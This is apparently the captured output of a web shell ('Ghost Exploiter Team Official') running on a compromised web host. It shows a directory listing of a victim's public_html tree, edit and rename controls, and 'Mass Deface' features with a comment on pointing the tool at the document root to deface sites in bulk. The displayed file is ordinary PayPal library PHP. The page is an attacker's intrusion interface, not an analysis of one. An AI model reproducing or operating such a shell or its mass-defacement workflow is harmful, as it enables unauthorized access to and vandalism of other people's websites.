webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
srmklive
/
paypal
/
src
/
Traits
/
PayPalAPI
/
Orders
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
Helpers.php
0.702KB
edt
ren
<?php namespace Srmklive\PayPal\Traits\PayPalAPI\Orders; use Throwable; trait Helpers { /** * Confirm payment for an order. * * @param string $order_id * @param string $processing_instruction * * @throws Throwable * * @return array|\Psr\Http\Message\StreamInterface|string */ public function setupOrderConfirmation(string $order_id, string $processing_instruction = '') { $body = [ 'processing_instruction' => $processing_instruction, 'application_context' => $this->experience_context, 'payment_source' => $this->payment_source, ]; return $this->confirmOrder($order_id, $body); } }